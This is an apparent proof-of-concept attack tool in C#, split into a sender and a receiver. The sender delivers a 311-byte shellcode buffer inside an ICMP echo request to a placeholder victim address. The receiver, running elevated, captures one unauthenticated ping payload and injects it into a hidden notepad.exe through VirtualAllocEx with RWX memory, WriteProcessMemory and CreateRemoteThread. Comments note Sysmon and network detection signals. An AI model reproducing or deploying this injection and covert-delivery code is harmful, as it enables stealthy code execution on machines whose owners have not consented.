// README.md
//   # shellcode-through-ICMP
//   https://blog.romanrii.com/using-icmp-to-deliver-shellcode
//
// ---------------------------------------------------------------------------
// pingInjection.cs  --  receiver side
// ---------------------------------------------------------------------------
using System;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Collections;
using System.IO;
using System.Diagnostics;

namespace PingInjection
{
    /// <summary>
    /// Receiver: takes the payload of a single inbound ICMP datagram and runs it
    /// inside a freshly started, hidden notepad.exe via the classic
    /// OpenProcess / VirtualAllocEx / WriteProcessMemory / CreateRemoteThread chain.
    /// Defender notes: the raw socket with ReceiveAll (SIO_RCVALL) generally needs an
    /// elevated process; the cross-process RWX allocation and the remote thread
    /// started in notepad.exe are the kind of events surfaced by Sysmon Event ID 10
    /// (ProcessAccess) and Event ID 8 (CreateRemoteThread), and by endpoint memory
    /// scanners that look for executable private memory outside any loaded image.
    /// </summary>
    class Program
    {
        // kernel32 P/Invoke declarations used by shellcodeInjection().
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processID);
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr IpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        [DllImport("kernel32.dll")]
        static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

        /// <summary>
        /// Starts a hidden notepad.exe and executes <paramref name="shellcode"/> inside it.
        /// </summary>
        /// <param name="shellcode">Bytes copied into the child process and run as a new thread.</param>
        public static void shellcodeInjection(byte[] shellcode)
        {
            Process proc = new Process();

            // The host process is always notepad.exe, started with a hidden window;
            // the parent/child relationship (this binary -> notepad.exe) is itself a
            // process-creation telemetry signal.
            proc.StartInfo.FileName = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE";
            proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            proc.Start();
            int notepadPID = proc.Id;
            // 0x001F0FFF == PROCESS_ALL_ACCESS on the just-created child.
            IntPtr hProcess = OpenProcess(0x001F0FFF, false, notepadPID);
            // 0x1000 bytes; 0x3000 == MEM_COMMIT | MEM_RESERVE; 0x40 == PAGE_EXECUTE_READWRITE.
            // An RWX region allocated in another process is a strong memory-scanning signal.
            IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
            byte[] buf = shellcode;
            IntPtr outSize;
            WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
            // Execution starts at the allocated region, i.e. at a thread start address
            // that belongs to no loaded module.
            IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        }

        /// <summary>
        /// Blocks until one ICMP datagram arrives on the hard-coded local address and
        /// returns 4068 bytes of it, starting at offset 28.
        /// </summary>
        /// <returns>
        /// A 4068-byte array; any bytes beyond what was actually received are zero,
        /// because the array is freshly allocated and <c>bytesRead</c> is not consulted.
        /// </returns>
        public static byte[] getShellcode()
        {
            // Raw ICMP socket. Creating one and enabling ReceiveAll below generally
            // requires an elevated process on Windows, so the receiver runs with high privilege.
            Socket icmpListener = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Icmp);
            // Local address is hard-coded and must be edited to the listener's own IP.
            icmpListener.Bind(new IPEndPoint(IPAddress.Parse("192.168.0.15"), 0));
            // SIO_RCVALL with option value 1: the socket sees all inbound IP traffic on
            // that interface, not only packets addressed to a bound port.
            icmpListener.IOControl(IOControlCode.ReceiveAll, new byte[] { 1, 0, 0, 0 }, new byte[] { 1, 0, 0, 0 });
            byte[] buffer = new byte[4096];
            EndPoint remoteEndPoint = new IPEndPoint(IPAddress.Any, 0);
            byte[] shellcode = new byte[4068];

            // Exactly one datagram is accepted, from any source and of any ICMP type:
            // nothing authenticates the sender or the payload, so any host able to
            // reach this machine with ICMP can supply the bytes that get executed.
            var bytesRead = icmpListener.ReceiveFrom(buffer, ref remoteEndPoint);
            // Offset 28 presumably skips a 20-byte IPv4 header plus the 8-byte ICMP
            // echo header (assumes no IP options); 4096 - 28 == 4068 is the remainder.
            System.Buffer.BlockCopy(buffer, 28, shellcode, 0, 4068);
            return shellcode;
        }


        /// <summary>One-shot entry point: receive one datagram, inject its payload, exit.</summary>
        static void Main(string[] args)
        {
            byte[] shellcode = getShellcode();
            shellcodeInjection(shellcode);
        }
    }
}

// ---------------------------------------------------------------------------
// shellcodeInjector.cs  --  sender side
// ---------------------------------------------------------------------------
using System.Net.NetworkInformation;

namespace shellcodeInjector
{
    /// <summary>
    /// Sender: places a fixed 311-byte buffer in the data field of a single ICMP echo
    /// request. The bytes travel in cleartext and the payload is far larger than a
    /// routine ping's, which is what a network sensor would key on.
    /// </summary>
    class Program
    {


        /// <summary>Sends one echo request carrying <c>buf</c> to the placeholder host.</summary>
        public static void sendShellcode()
        {
            Ping pingSender = new Ping();
            int timeout = 10000; // milliseconds
            // Opaque payload carried as the echo-request data. Its trailing bytes decode to
            // the ASCII strings "Ping Injection" and "Shellcode Injection via PING".
            byte[] buf = new byte[311] {0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x0d,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x50,0x69,0x6e,0x67,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x00,0x53,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x20,0x76,0x69,0x61,0x20,0x50,0x49,0x4e,0x47,0x00 };


            // TTL 64 with don't-fragment set: the whole 311-byte payload has to fit in one packet.
            PingOptions options = new PingOptions(64, true);
            // "VictimPrivIPHere" is a placeholder the author expects to be edited;
            // no DNS/IP validation happens before the send.
            pingSender.Send("VictimPrivIPHere", timeout, buf, options);
        }


        /// <summary>Entry point: sends the single echo request and exits.</summary>
        static void Main(string[] args)
        {
            sendShellcode();
        }
    }
}